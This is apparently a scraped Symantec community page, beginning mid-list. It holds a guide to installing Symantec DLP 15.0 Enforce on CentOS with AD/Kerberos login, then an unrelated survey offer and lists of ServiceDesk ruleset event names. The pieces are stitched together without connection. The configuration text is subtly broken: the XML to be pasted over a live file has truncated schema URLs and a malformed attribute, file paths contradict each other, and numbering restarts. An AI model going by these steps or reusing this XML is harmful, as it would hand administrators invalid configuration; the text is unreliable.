13. Once you execute the above script a pop up box will appear. Follow the instructions on screen until setup has completed.
14. Use the following guide to help you complete your start at page 24 https://symwisedownload.symantec.com//resources/sites/SYMWISE/content/live/DOCUMENTATION/9000/DOC9257/en_US/Symantec_DLP_15.0_Install_Guide_Lin.pdf?__gda__=1524118694_cbfca973051ba9b66c31baec36938421

CentosEnforce & Detection install

1. Log into the server as root
2. Copy the ProtectInstaller64_15.0.sh file to /opt/temp/
3. Go to cd /opt/temp/
4. Run chmod a+x ProtectInstaller64_15.0.sh
5. Then type ./ ProtectInstaller64_15.0.sh
6. Select which service you want to install, in this instance we want to install the Enforce server. To install detection servers on a Centos or RHEL system use steps 1 - 9
7. Follow the rest of the setup steps
8. When you arrive at step 7 use the following for directories Base directory=/home/oracle Home Directory=/home/oracle/app/oracle/product/12.2.0/client_XX XX represents your client number
9. For step 8 enter the IP address of where your Oracle Database is installed
10. Once the Enforce has been installed try connecting to the web portal in either I.E or Firefox (Chrome is not supported) using the IP address of the server I.e https://10.10.100.102
11. When you land on the Web portal you will need to log in as Administrator (This is case sensitive) and use the password you supplied during the enforce setup.
12. The 1st thing you should do is create a DLP group, you can find this under System -> Login Management -> Roles
13. Once you have created a role you will need to create a user. To do this go to System -> Login Management -> DLP Users. Create your user with the same username that is specified in the Active Directory. This helps keep the Active Directory integration working.
14. We now need to create a Directory Connection go to System -> Settings -> Directory Connections, and add the details of your domain here
15. Next we need to create a Data Source. We need to navigate to System -> Users -> Data Sources. Click on the Add button and select AD User Source give the User Source a name and then press submit.
16. Select the Data Source that you have just created and then press the import button. Once it has finished check on the status this should say if anything was imported
17. We now need to add Domain Authentication to the enforce server. The easiest way to do this is to use WinSCP. Open WInSCP and navigate to the /opt/ directory. Right click on the SymantecDLP and click download, this ensure that we have a backup of the directory should something go wrong.
18. Once you have download the directory in the step above proceed to creating the krb5.conf file. If you navigate to /opt/SymantecDLP/Protect/config you will find a krb.ini file, open this up and replace the text to uppercase text with your Domain and Domain Controller details(**as we are doing this on a Linux Server you must ensure you specify your details in uppercase:

[libdefaults]

           default_realm = YOURDOMAIN.COM

[realms]

           NAMEOFYOURDC1.YOURDOMAIN.COM = {

                           kdc = NAMEOFYOURDC1.YOURDOMAIN.COM

                        }

           NAMEOFYOURDC2.YOURDOMAIN.COM = {

                           kdc = NAMEOFYOURDC2.YOURDOMAIN.COM

                        }

1. If you only have one domain controller then delete the lines below it
2. Once you have added in your domain realm and domain controllers save the file and rename it from krb5.ini to krb5.conf
3. Copy the file from (either use cp – copy or mv – move) /opt/SymantecDLP/Protect/conf/krb5.conf to /etc/krb5.conf
4. To test the configuration use the following command to test you can talk to your AD kinit yourloginname@YOURDOMAIN.COM press enter and you will be prompted to enter your domain password
5. We now need to edit the springSecurityContext.xml file, this is located in /opt/SymantecDLP/Protect/tomcat/webapps/ProtectManager/WEB-INF. As we have downloaded the directory already we do not need to make a copy. Open the springSecurityContext.xml and paste the following over what is already in the file:  

<?xml version="1.0" encoding="UTF-8" ?>

<!--

 Copyright (c) 2017 Symantec Corporation. All rights reserved.

 THIS SOFTWARE CONTAINS CONFIDENTIAL INFORMATION AND TRADE SECRETS OF SYMANTEC

 CORPORATION.  USE, DISCLOSURE OR REPRODUCTION IS PROHIBITED WITHOUT THE PRIOR

 EXPRESS WRITTEN PERMISSION OF SYMANTEC CORPORATION.

 The Licensed Software and Documentation are deemed to be commercial computer

 software as defined in FAR 12.212 and subject to restricted rights as defined

 in FAR Section 52.227-19 "Commercial Computer Software - Restricted Rights"

 and DFARS 227.7202, "Rights in Commercial Computer Software or Commercial

 Computer Software Documentation", as applicable, and any successor

 regulations.  Any use, modification, reproduction release, performance,

 display or disclosure of the Licensed Software and Documentation by the U.S.

 Government shall be solely in accordance with the terms of this Agreement.

-->

<beans xmlns="http://www.springframework.org/schema/beans"

        xmlns:security="http://www.springframework.org/schema/security"

        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:context="http://www.springframework.org/schema/context"

        xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring...

              http://www.springframework.org/schema/securityhttp://www.springframework.org/schema/security/spr...http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-3.1.xsd">

        <!-- Enable auto-wiring -->

        <context:annotation-config />

        <!--security:debug /-->

        <!-- Unsecured resources -->

        <security:http security="none" pattern="/browsercss/**" />

        <security:http security="none" pattern="/graphics/**" />

        <security:http security="none" pattern="/help/**" />

        <security:http security="none" pattern="/pagecss/**" />

        <security:http security="none" pattern="/yui3/**" />

        <security:http security="none" pattern="/widgetcss/**" />

        <security:http security="none" pattern="/js/**" />

        <security:http security="none" pattern="/*.css" />

        <security:http security="none" pattern="/servlet/l10n/css/**" />

        <security:http security="none" pattern="/GlobalDialog*" />     

        <security:http security="none" request-matcher="regex" pattern="\/services\/v2011\/incidents\?(?i)(wsdl|xsd=[1-5])$" />

        <!-- Web service security filter: HTTP basic authentication -->

        <security:http pattern="/webservices/**" use-expressions="false" create-session="never" authentication-manager-ref="basicAuthManager">

                <security:intercept-url pattern="/webservices/**" access="ROLE_manager_user" />

                <security:http-basic entry-point-ref="basicAuthEntryPoint"/>

                <security:csrf disabled="true" />

        </security:http>

        <security:http pattern="/services/**" use-expressions="false" create-session="stateless" authentication-manager-ref="basicAuthManager">

                <security:intercept-url pattern="/services/**" access="ROLE_manager_user" />

                <security:http-basic entry-point-ref="basicAuthEntryPoint"/>

                <security:csrf disabled="true" />

        </security:http>

        <!-- Web portal security filter: AD/Kerberos authentication -->

        <security:http use-expressions="false" authentication-manager-ref="kerberosAuthManager">

                <security:intercept-url pattern="/Logon*" access="IS_AUTHENTICATED_ANONYMOUSLY" />

                <security:intercept-url pattern="/**" access="ROLE_manager_user" />

                <security:form-login login-page="/Logon"

                        default-target-url="/" authentication-failure-url="/GlobalDialog?type=LOGON_ERROR"

                        username-parameter="j_username" password-parameter="j_password"

                        login-processing-url="/j_security_check" />

                <security:logout logout-success-url="/GlobalDialog" />

                <security:csrf disabled="true" />

        </security:http>

        <!-- Web service authentication manager -->

        <security:authentication-manager id="basicAuthManager">

            <!-- Enable user name and password authentication through Enforce DB  -->

            <security:authentication-provider ref="formAuthenticationProvider" />

            <!-- Enable AD/Kerberos authentication -->

            <security:authentication-provider ref="kerberosAuthenticationProvider" />         

        </security:authentication-manager>

        <!-- Web portal user authentication manager -->

        <security:authentication-manager id="kerberosAuthManager">

            <!-- Enable AD/Kerberos authentication -->

            <security:authentication-provider ref="kerberosAuthenticationProvider" />

        </security:authentication-manager>

        <!-- Kerberos authentication provider -->

        <bean id="kerberosAuthenticationProvider"  class="com.vontu.login.spring.VontuKerberosAuthenticationProvider">

                <property name="kerberosClient">

                        <bean class="org.springframework.security.kerberos.authentication.sun.SunJaasKerberosClient">

                        </bean>

                </property>

                <property name="userDetailsService" ref="userLookupService"/>

        </bean>

        <bean id="userLookupService"   class="com.vontu.login.spring.VontuKerberosUserDetailsService" />

        <!-- Set krbConfLocation in System properties -->

        <bean class="org.springframework.security.kerberos.authentication.sun.GlobalSunJaasKerberosConfig">

                <!-- krb5 configuration file location.

                For example C:\SymantecDLP\Protect\config\krb5.ini on Windows or /opt/Vontu/Protect/config/krb5.conf on Linux

                -->

                <property name="krbConfLocation"value="/etc/krb5.conf"/>

        </bean>

        <!-- Form authentication provider -->

        <bean id="formAuthenticationProvider" class="com.vontu.login.spring.VontuFormAuthenticationProvider" />

        <!-- Web service basic authentication entry point that returns error code 401 (i.e. SC_UNAUTHORIZED) -->

        <bean id="basicAuthEntryPoint" class="com.vontu.login.spring.WebServiceAuthenticationEntryPoint">

                <property name="realmName" value="Webservices" />

        </bean>

</beans>

1. The above script is telling the tomcat server to look for the krb5.conf file in /etc/ which has been highlighted in bold. Once you have pasted the text into this file save and close it.
2. You will now need to reboot your server. Once the server has been rebooted open the web app and you should now see your domain name in the login screen. Login in using the Active Directory user you created in step 12 and use your domain password to login.
3. Once you have logged in you have successfully added your AD integration. Proceed to the DLP Admin guide for adding detection servers to your enforce server.

At Symantec we are always looking to improve.  With that in mind, we have an opportunity for you to provide feedback on the Symantec.com site to help us improve the website browsing experience.   Potential candidates would need to be available for a 1-hour online Webex session during the week of May 21 where you will be asked to answer a few questions about the current site and share your thoughts on upcoming rollouts.  

As a small token of our appreciation,  selected candidates would be compensated $100 via Payal for their valuable time and thoughts on how we can continually improve our site.  Please go here: https://www.surveymonkey.com/r/YV7KW6W to begin the selection process and thank you again for offering to help us make our site the BEST!

*Selected candidates will be contacted within the next 2 weeks to schedule a test session.

Admin | Process Automation | [Choose Service] | Service Dashboard

Manage Rulesets

To learn how to add/amend these Rules see the Rulesets Article.

Software Request

SD-SR-APPROVAL

• OnApprovalTaskTimedOut
• OnPendingTaskTimedOut
• OnRequestApproved
• OnRequestDenied
• OnRequestFulfilled
• OnRequestPlacedOnHold
• OnRequestReceived
• OnRequestResumed

I'll be adding some examples for each over time, please share your own if you've done anything unique.  

Admin | Process Automation | [Choose Service] | Service Dashboard

Manage Rulesets

To learn how to add/amend these Rules see the Rulesets Article.

Software Delivery

SD-SR-DELIVERY

• OnDeliveryAuthorizationDenied
• OnDeliveryAuthorizationGranted 
• OnDeliveryAuthorizationPaused
• OnDeliveryAuthorizationResumed 
• OnDeliveryCompleted
• OnDeliveryConfirmed
• OnDeliveryFailed 
• OnManagedSoftwareDeliveryStarted 
• OnRemediationNeeded
• OnSoftwareManagementTaskCompleted 
• OnUnmanagedSoftwareDeliveryStarted

I'll be adding some examples for each over time, please share your own if you've done anything unique.  

Admin | Process Automation | [Choose Service] | Service Dashboard

Manage Rulesets

To learn how to add/amend these Rules see the Rulesets Article.

PROBLEM-MANAGEMENT 

• OnAssociatedChangeImplementationComplete
• OnAssociatedChangeNotImplemented
• OnProblemAnalysisComplete
• OnProblemComplete
• OnProblemProposalAccepted
• OnProblemProposalRejected
• OnProblemReceived
• OnProblemRemoved
• OnProcessRelationshipCreated
• OnWaitingForChange

I'll be adding some examples for each over time, please share your own if you've done anything unique.  

Admin | Process Automation | [Choose Service] | Service Dashboard

Manage Rulesets

To learn how to add/amend these Rules see the Rulesets Article.

CHANGE-MGMT 

• OnCabApproval
• OnChangeReceived
• OnImplementationCompleted
• OnImplementationDateReached
• OnImplementationPlanFailed
• OnPlanningCompleted
• OnPlanRejectedByCab
• OnRequestRejectedByCm
• OnTicketPlacedOnHold
• OnTicketRemovedFromHold

I'll be adding some examples for each over time, please share your own if you've done anything unique.